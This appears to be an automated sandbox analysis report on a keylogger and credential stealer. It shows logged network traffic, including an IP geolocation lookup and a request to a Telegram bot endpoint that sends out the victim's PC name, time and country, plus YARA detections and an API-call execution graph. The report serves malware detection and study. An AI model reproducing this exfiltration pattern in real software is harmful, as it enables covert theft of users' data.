                                                                                                                                    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    8192.168.2.749761104.21.67.1524436748C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-26 08:47:23 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                    2024-11-26 08:47:23 UTC855INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:47:23 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 361
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 574752
                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ZtiMv1AN6GGwQI1xqX0nxjsx633R6%2FpjJifOUyf%2F4CzJ4%2Bvd%2F65d16osopzNgVt5W8OHVwAzzX1YDAaND7mcKQi9owg9YsUyTcKGenJLkoB55qDDhH1KA%2FrCbQ5kJQSu5ZXsOSQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8e889d0b3dae4337-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1793&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1348729&cwnd=215&unsent_bytes=0&cid=6e5d9d079d732777&ts=464&x=0"
                                                                                                                                    2024-11-26 08:47:23 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    9192.168.2.749767149.154.167.2204436748C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-26 08:47:25 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:258555%0D%0ADate%20and%20Time:%2027/11/2024%20/%2012:08:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20258555%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                    Host: api.telegram.org
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    2024-11-26 08:47:25 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                    Date: Tue, 26 Nov 2024 08:47:25 GMT
                                                                                                                                    Content-Type: application/json
                                                                                                                                    Content-Length: 55
                                                                                                                                    Connection: close
                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                    2024-11-26 08:47:25 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                    Statistics

                                                                                                                                    CPU Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    Memory Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    High Level Behavior Distribution

                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                    System Behavior

                                                                                                                                    General

                                                                                                                                    Target ID:0
                                                                                                                                    Start time:03:46:50
                                                                                                                                    Start date:26/11/2024
                                                                                                                                    Path:C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe"
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:207'872 bytes
                                                                                                                                    MD5 hash:17FDE190E651AEE3335ED55EEAA1A6DB
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.3680555614.0000000002581000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:false

                                                                                                                                    Disassembly

                                                                                                                                    Reset < >

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:8.7%
                                                                                                                                      Dynamic/Decrypted Code Coverage:53%
                                                                                                                                      Signature Coverage:25%
                                                                                                                                      Total number of Nodes:428
                                                                                                                                      Total number of Limit Nodes:37
                                                                                                                                      execution_graph 83308 65db5c8 83309 65db60e GetCurrentProcess 83308->83309 83311 65db659 83309->83311 83312 65db660 GetCurrentThread 83309->83312 83311->83312 83313 65db69d GetCurrentProcess 83312->83313 83314 65db696 83312->83314 83316 65db6d3 83313->83316 83314->83313 83315 65db6fb GetCurrentThreadId 83317 65db72c 83315->83317 83320 65db808 83316->83320 83325 65db798 83316->83325 83321 65db80e DuplicateHandle 83320->83321 83324 65db75b 83320->83324 83323 65db8a6 83321->83323 83323->83315 83324->83315 83326 65db75b 83325->83326 83326->83315 83327 20bd05c 83328 20bd074 83327->83328 83329 20bd0ce 83328->83329 83334 70a79d9 83328->83334 83343 70a6881 83328->83343 83347 70a3a94 83328->83347 83356 70a6888 83328->83356 83335 70a79e2 83334->83335 83336 70a7a49 83335->83336 83337 70a7a39 83335->83337 83376 70a3bbc 83336->83376 83360 70a7b60 83337->83360 83365 70a7b70 83337->83365 83370 70a7c3c 83337->83370 83339 70a7a47 83344 70a6888 83343->83344 83345 70a3a94 CallWindowProcW 83344->83345 83346 70a68cf 83345->83346 83346->83329 83348 70a3a9f 83347->83348 83349 70a7a49 83348->83349 83351 70a7a39 83348->83351 83350 70a3bbc CallWindowProcW 83349->83350 83352 70a7a47 83350->83352 83353 70a7c3c CallWindowProcW 83351->83353 83354 70a7b60 CallWindowProcW 83351->83354 83355 70a7b70 CallWindowProcW 83351->83355 83352->83352 83353->83352 83354->83352 83355->83352 83357 70a68ae 83356->83357 83358 70a3a94 CallWindowProcW 83357->83358 83359 70a68cf 83358->83359 83359->83329 83362 70a7b5f 83360->83362 83361 70a7c10 83361->83339 83362->83360 83380 70a7c18 83362->83380 83384 70a7c28 83362->83384 83366 70a7b84 83365->83366 83368 70a7c18 CallWindowProcW 83366->83368 83369 70a7c28 CallWindowProcW 83366->83369 83367 70a7c10 83367->83339 83368->83367 83369->83367 83371 70a7bfa 83370->83371 83372 70a7c4a 83370->83372 83374 70a7c18 CallWindowProcW 83371->83374 83375 70a7c28 CallWindowProcW 83371->83375 83373 70a7c10 83373->83339 83374->83373 83375->83373 83377 70a3bc7 83376->83377 83378 70a8eaa CallWindowProcW 83377->83378 83379 70a8e59 83377->83379 83378->83379 83379->83339 83381 70a7c28 83380->83381 83382 70a7c39 83381->83382 83387 70a8de2 83381->83387 83382->83361 83385 70a7c39 83384->83385 83386 70a8de2 CallWindowProcW 83384->83386 83385->83361 83386->83385 83388 70a8dea 83387->83388 83391 70a8e4d 83387->83391 83389 70a3bbc CallWindowProcW 83388->83389 83390 70a8dfa 83389->83390 83390->83382 83391->83382 83392 70a66d0 83393 70a6738 CreateWindowExW 83392->83393 83395 70a67f4 83393->83395 83396 40cbdd 83397 40cbe9 ___lock_fhandle 83396->83397 83440 40d534 HeapCreate 83397->83440 83400 40cc46 83501 41087e 71 API calls 8 library calls 83400->83501 83403 40cc4c 83404 40cc50 83403->83404 83405 40cc58 __RTC_Initialize 83403->83405 83502 40cbb4 62 API calls 3 library calls 83404->83502 83442 411a15 67 API calls 2 library calls 83405->83442 83407 40cc57 83407->83405 83409 40cc66 83410 40cc72 GetCommandLineA 83409->83410 83411 40cc6a 83409->83411 83443 412892 71 API calls 3 library calls 83410->83443 83503 40e79a 62 API calls 3 library calls 83411->83503 83414 40cc71 83414->83410 83415 40cc82 83504 4127d7 107 API calls 3 library calls 83415->83504 83417 40cc8c 83418 40cc90 83417->83418 83419 40cc98 83417->83419 83505 40e79a 62 API calls 3 library calls 83418->83505 83444 41255f 106 API calls 6 library calls 83419->83444 83422 40cc97 83422->83419 83423 40cc9d 83424 40cca1 83423->83424 83425 40cca9 83423->83425 83506 40e79a 62 API calls 3 library calls 83424->83506 83445 40e859 73 API calls 5 library calls 83425->83445 83428 40cca8 83428->83425 83429 40ccb0 83430 40ccb5 83429->83430 83431 40ccbc 83429->83431 83507 40e79a 62 API calls 3 library calls 83430->83507 83446 4019f0 OleInitialize 83431->83446 83434 40ccbb 83434->83431 83435 40ccd8 83436 40ccea 83435->83436 83508 40ea0a 62 API calls _doexit 83435->83508 83509 40ea36 62 API calls _doexit 83436->83509 83439 40ccef ___lock_fhandle 83441 40cc3a 83440->83441 83441->83400 83500 40cbb4 62 API calls 3 library calls 83441->83500 83442->83409 83443->83415 83444->83423 83445->83429 83447 401ab9 83446->83447 83510 40b99e 83447->83510 83449 401abf 83450 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 83449->83450 83480 402467 83449->83480 83451 401dc3 CloseHandle GetModuleHandleA 83450->83451 83458 401c55 83450->83458 83523 401650 83451->83523 83453 401e8b FindResourceA LoadResource LockResource SizeofResource 83525 40b84d 83453->83525 83457 401c9c CloseHandle 83457->83435 83458->83457 83463 401cf9 Module32Next 83458->83463 83459 401ecb _memset 83460 401efc SizeofResource 83459->83460 83461 401f1c 83460->83461 83462 401f5f 83460->83462 83461->83462 83581 401560 __VEC_memcpy __cftoe2_l 83461->83581 83464 401f92 _memset 83462->83464 83582 401560 __VEC_memcpy __cftoe2_l 83462->83582 83463->83451 83474 401d0f 83463->83474 83467 401fa2 FreeResource 83464->83467 83468 40b84d _malloc 62 API calls 83467->83468 83469 401fbb SizeofResource 83468->83469 83470 401fe5 _memset 83469->83470 83471 4020aa LoadLibraryA 83470->83471 83472 401650 83471->83472 83473 40216c GetProcAddress 83472->83473 83476 4021aa 83473->83476 83473->83480 83474->83457 83475 401dad Module32Next 83474->83475 83475->83451 83475->83474 83476->83480 83555 4018f0 83476->83555 83478 40243f 83478->83480 83583 40b6b5 62 API calls 2 library calls 83478->83583 83480->83435 83481 4021f1 83481->83478 83567 401870 83481->83567 83483 402269 VariantInit 83484 401870 75 API calls 83483->83484 83485 40228b VariantInit 83484->83485 83486 4022a7 83485->83486 83487 4022d9 SafeArrayCreate SafeArrayAccessData 83486->83487 83572 40b350 83487->83572 83490 40232c 83491 402354 SafeArrayDestroy 83490->83491 83499 40235b 83490->83499 83491->83499 83492 402392 SafeArrayCreateVector 83493 4023a4 83492->83493 83494 4023bc VariantClear VariantClear 83493->83494 83574 4019a0 83494->83574 83497 40242e 83498 4019a0 65 API calls 83497->83498 83498->83478 83499->83492 83500->83400 83501->83403 83502->83407 83503->83414 83504->83417 83505->83422 83506->83428 83507->83434 83508->83436 83509->83439 83511 40b9aa ___lock_fhandle _strnlen 83510->83511 83512 40b9b8 83511->83512 83516 40b9ec 83511->83516 83584 40bfc1 62 API calls __getptd_noexit 83512->83584 83514 40b9bd 83585 40e744 6 API calls 2 library calls 83514->83585 83586 40d6e0 62 API calls 2 library calls 83516->83586 83518 40b9f3 83587 40b917 120 API calls 3 library calls 83518->83587 83520 40b9ff 83588 40ba18 LeaveCriticalSection _doexit 83520->83588 83521 40b9cd ___lock_fhandle 83521->83449 83524 4017cc _realloc 83523->83524 83524->83453 83526 40b900 83525->83526 83531 40b85f 83525->83531 83596 40d2e3 6 API calls __decode_pointer 83526->83596 83528 40b906 83597 40bfc1 62 API calls __getptd_noexit 83528->83597 83529 40b870 83529->83531 83589 40ec4d 62 API calls 2 library calls 83529->83589 83590 40eaa2 62 API calls 7 library calls 83529->83590 83591 40e7ee GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 83529->83591 83531->83529 83535 40b8bc RtlAllocateHeap 83531->83535 83537 401ebf 83531->83537 83538 40b8ec 83531->83538 83541 40b8f1 83531->83541 83592 40b7fe 62 API calls 4 library calls 83531->83592 83593 40d2e3 6 API calls __decode_pointer 83531->83593 83535->83531 83543 40af66 83537->83543 83594 40bfc1 62 API calls __getptd_noexit 83538->83594 83595 40bfc1 62 API calls __getptd_noexit 83541->83595 83545 40af70 83543->83545 83544 40b84d _malloc 62 API calls 83544->83545 83545->83544 83546 40af8a 83545->83546 83550 40af8c std::bad_alloc::bad_alloc 83545->83550 83598 40d2e3 6 API calls __decode_pointer 83545->83598 83546->83459 83548 40afb2 83600 40af49 62 API calls std::exception::exception 83548->83600 83550->83548 83599 40d2bd 73 API calls __cinit 83550->83599 83551 40afbc 83601 40cd39 RaiseException 83551->83601 83554 40afca 83556 401903 lstrlenA 83555->83556 83557 4018fc 83555->83557 83602 4017e0 83556->83602 83557->83481 83560 401940 GetLastError 83562 40194b MultiByteToWideChar 83560->83562 83563 40198d 83560->83563 83561 401996 83561->83481 83564 4017e0 72 API calls 83562->83564 83563->83561 83610 401030 GetLastError 83563->83610 83565 401970 MultiByteToWideChar 83564->83565 83565->83563 83568 40af66 74 API calls 83567->83568 83569 40187c 83568->83569 83570 401885 SysAllocString 83569->83570 83571 4018a4 83569->83571 83570->83571 83571->83483 83573 40231a SafeArrayUnaccessData 83572->83573 83573->83490 83575 4019aa InterlockedDecrement 83574->83575 83580 4019df VariantClear 83574->83580 83576 4019b8 83575->83576 83575->83580 83577 4019c2 SysFreeString 83576->83577 83578 4019c9 83576->83578 83576->83580 83577->83578 83614 40aec0 63 API calls 2 library calls 83578->83614 83580->83497 83581->83461 83582->83464 83583->83480 83584->83514 83586->83518 83587->83520 83588->83521 83589->83529 83590->83529 83592->83531 83593->83531 83594->83541 83595->83537 83596->83528 83597->83537 83598->83545 83599->83548 83600->83551 83601->83554 83603 4017e9 83602->83603 83608 401844 83603->83608 83609 40182d 83603->83609 83611 40b783 72 API calls 4 library calls 83603->83611 83607 40186d MultiByteToWideChar 83607->83560 83607->83561 83608->83607 83613 40b743 62 API calls 2 library calls 83608->83613 83609->83608 83612 40b6b5 62 API calls 2 library calls 83609->83612 83611->83609 83612->83608 83613->83608 83614->83580 83615 216e568 83616 216e574 83615->83616 83653 61c2580 83616->83653 83658 61c2572 83616->83658 83617 216e616 83663 63b7fe0 83617->83663 83668 63b7fcf 83617->83668 83618 216e727 83673 6426500 83618->83673 83678 6426510 83618->83678 83619 216e838 83683 6426bb8 83619->83683 83688 6426ba9 83619->83688 83620 216e83f 83693 6452688 83620->83693 83698 6452678 83620->83698 83621 216e949 83703 6452b50 83621->83703 83708 6452b40 83621->83708 83622 216e950 83713 6458b71 83622->83713 83718 6458b80 83622->83718 83623 216ea5a 83723 6458e08 83623->83723 83728 6458df8 83623->83728 83624 216ea61 83733 642fb22 83624->83733 83738 642fb28 83624->83738 83625 216eb6b 83743 6417a18 83625->83743 83748 6417a28 83625->83748 83626 216ec83 83753 641da48 83626->83753 83758 641da58 83626->83758 83627 216ed8d 83628 216ee35 83627->83628 83763 65da4b0 83627->83763 83767 65da4c0 83627->83767 83654 61c25a2 83653->83654 83655 61c2671 83654->83655 83771 61c9578 83654->83771 83775 61c995f 83654->83775 83655->83617 83659 61c253c 83658->83659 83659->83658 83660 61c2671 83659->83660 83661 61c995f LdrInitializeThunk 83659->83661 83662 61c9578 LdrInitializeThunk 83659->83662 83660->83617 83661->83660 83662->83660 83664 63b8002 83663->83664 83665 63b8117 83664->83665 83666 61c995f LdrInitializeThunk 83664->83666 83667 61c9578 LdrInitializeThunk 83664->83667 83665->83618 83666->83665 83667->83665 83669 63b7fd8 83668->83669 83670 63b8117 83669->83670 83671 61c995f LdrInitializeThunk 83669->83671 83672 61c9578 LdrInitializeThunk 83669->83672 83670->83618 83671->83670 83672->83670 83674 6426510 83673->83674 83675 642664f 83674->83675 83676 61c995f LdrInitializeThunk 83674->83676 83677 61c9578 LdrInitializeThunk 83674->83677 83675->83619 83676->83675 83677->83675 83679 6426515 83678->83679 83680 642664f 83679->83680 83681 61c995f LdrInitializeThunk 83679->83681 83682 61c9578 LdrInitializeThunk 83679->83682 83680->83619 83681->83680 83682->83680 83684 6426bbd 83683->83684 83685 6426cb0 83684->83685 83686 61c995f LdrInitializeThunk 83684->83686 83687 61c9578 LdrInitializeThunk 83684->83687 83685->83620 83686->83685 83687->83685 83689 6426bb6 83688->83689 83690 6426cb0 83689->83690 83691 61c995f LdrInitializeThunk 83689->83691 83692 61c9578 LdrInitializeThunk 83689->83692 83690->83620 83691->83690 83692->83690 83694 64526aa 83693->83694 83695 6452780 83694->83695 83696 61c995f LdrInitializeThunk 83694->83696 83697 61c9578 LdrInitializeThunk 83694->83697 83695->83621 83696->83695 83697->83695 83702 645267d 83698->83702 83699 6452780 83699->83621 83700 61c995f LdrInitializeThunk 83700->83699 83701 61c9578 LdrInitializeThunk 83701->83699 83702->83699 83702->83700 83702->83701 83704 6452b55 83703->83704 83705 64527b0 83704->83705 83706 61c995f LdrInitializeThunk 83704->83706 83707 61c9578 LdrInitializeThunk 83704->83707 83705->83622 83706->83705 83707->83705 83709 6452b4e 83708->83709 83710 64527b0 83709->83710 83711 61c995f LdrInitializeThunk 83709->83711 83712 61c9578 LdrInitializeThunk 83709->83712 83710->83622 83711->83710 83712->83710 83714 6458b9c 83713->83714 83715 6458c4a 83714->83715 83716 61c995f LdrInitializeThunk 83714->83716 83717 61c9578 LdrInitializeThunk 83714->83717 83715->83623 83716->83715 83717->83715 83719 6458b9c 83718->83719 83720 6458c4a 83719->83720 83721 61c995f LdrInitializeThunk 83719->83721 83722 61c9578 LdrInitializeThunk 83719->83722 83720->83623 83721->83720 83722->83720 83724 6458e2a 83723->83724 83725 6458edd 83724->83725 83726 61c995f LdrInitializeThunk 83724->83726 83727 61c9578 LdrInitializeThunk 83724->83727 83725->83624 83726->83725 83727->83725 83729 6458e03 83728->83729 83730 6458edd 83729->83730 83731 61c995f LdrInitializeThunk 83729->83731 83732 61c9578 LdrInitializeThunk 83729->83732 83730->83624 83731->83730 83732->83730 83734 642fb4a 83733->83734 83735 642fbfd 83734->83735 83736 61c995f LdrInitializeThunk 83734->83736 83737 61c9578 LdrInitializeThunk 83734->83737 83735->83625 83736->83735 83737->83735 83739 642fb4a 83738->83739 83740 642fbfd 83739->83740 83741 61c995f LdrInitializeThunk 83739->83741 83742 61c9578 LdrInitializeThunk 83739->83742 83740->83625 83741->83740 83742->83740 83744 6417a22 83743->83744 83745 6417af2 83744->83745 83746 61c995f LdrInitializeThunk 83744->83746 83747 61c9578 LdrInitializeThunk 83744->83747 83745->83626 83746->83745 83747->83745 83749 6417a44 83748->83749 83750 6417af2 83749->83750 83751 61c995f LdrInitializeThunk 83749->83751 83752 61c9578 LdrInitializeThunk 83749->83752 83750->83626 83751->83750 83752->83750 83754 641da52 83753->83754 83755 641db22 83754->83755 83756 61c995f LdrInitializeThunk 83754->83756 83757 61c9578 LdrInitializeThunk 83754->83757 83755->83627 83756->83755 83757->83755 83759 641da74 83758->83759 83760 641db22 83759->83760 83761 61c995f LdrInitializeThunk 83759->83761 83762 61c9578 LdrInitializeThunk 83759->83762 83760->83627 83761->83760 83762->83760 83764 65da4c0 83763->83764 83779 65d9cdc 83764->83779 83768 65da4c5 83767->83768 83769 65d9cdc 3 API calls 83768->83769 83770 65da4f0 83769->83770 83770->83628 83774 61c95a9 83771->83774 83772 61c970c 83772->83655 83773 61c9a9c LdrInitializeThunk 83773->83772 83774->83772 83774->83773 83776 61c9816 83775->83776 83777 61c9a9c LdrInitializeThunk 83776->83777 83778 61c9ab4 83777->83778 83778->83655 83781 65d9ce7 83779->83781 83783 65db444 83781->83783 83782 65dbe76 83782->83782 83785 65db44f 83783->83785 83784 65dc714 83786 65dc76f 83784->83786 83795 70ab5c8 83784->83795 83799 70ab978 83784->83799 83785->83784 83785->83786 83790 65de3a8 83785->83790 83786->83782 83791 65de3c9 83790->83791 83792 65de3ed 83791->83792 83803 65de558 83791->83803 83807 65de548 83791->83807 83792->83784 83797 70ab976 83795->83797 83796 70abe40 WaitMessage 83796->83797 83797->83796 83798 70aba2a 83797->83798 83798->83786 83801 70ab9dd 83799->83801 83800 70aba2a 83800->83786 83801->83800 83802 70abe40 WaitMessage 83801->83802 83802->83801 83804 65de565 83803->83804 83805 65de59e 83804->83805 83812 65dd094 83804->83812 83805->83792 83808 65de53c 83807->83808 83809 65de552 83807->83809 83808->83792 83810 65de59e 83809->83810 83811 65dd094 GetModuleHandleW 83809->83811 83810->83792 83811->83810 83813 65dd09f 83812->83813 83815 65de610 83813->83815 83816 65dd0c8 83813->83816 83815->83815 83817 65dd0d3 83816->83817 83823 65dd0d8 83817->83823 83819 65de67f 83827 70a4210 83819->83827 83832 70a4228 83819->83832 83820 65de6b9 83820->83815 83826 65dd0e3 83823->83826 83824 65dfa80 83824->83819 83825 65de3a8 GetModuleHandleW 83825->83824 83826->83824 83826->83825 83828 70a4228 83827->83828 83829 70a4265 83828->83829 83838 70a44a0 83828->83838 83841 70a4490 83828->83841 83829->83820 83834 70a42a5 83832->83834 83835 70a4259 83832->83835 83833 70a4265 83833->83820 83834->83820 83835->83833 83836 70a4490 GetModuleHandleW 83835->83836 83837 70a44a0 GetModuleHandleW 83835->83837 83836->83834 83837->83834 83845 70a44e2 83838->83845 83839 70a44aa 83839->83829 83842 70a44a0 83841->83842 83844 70a44e2 GetModuleHandleW 83842->83844 83843 70a44aa 83843->83829 83844->83843 83846 70a4524 83845->83846 83848 70a4501 83845->83848 83846->83839 83847 70a4728 GetModuleHandleW 83849 70a4755 83847->83849 83848->83846 83848->83847 83849->83839

                                                                                                                                      Executed Functions

                                                                                                                                      Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747comprocessCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
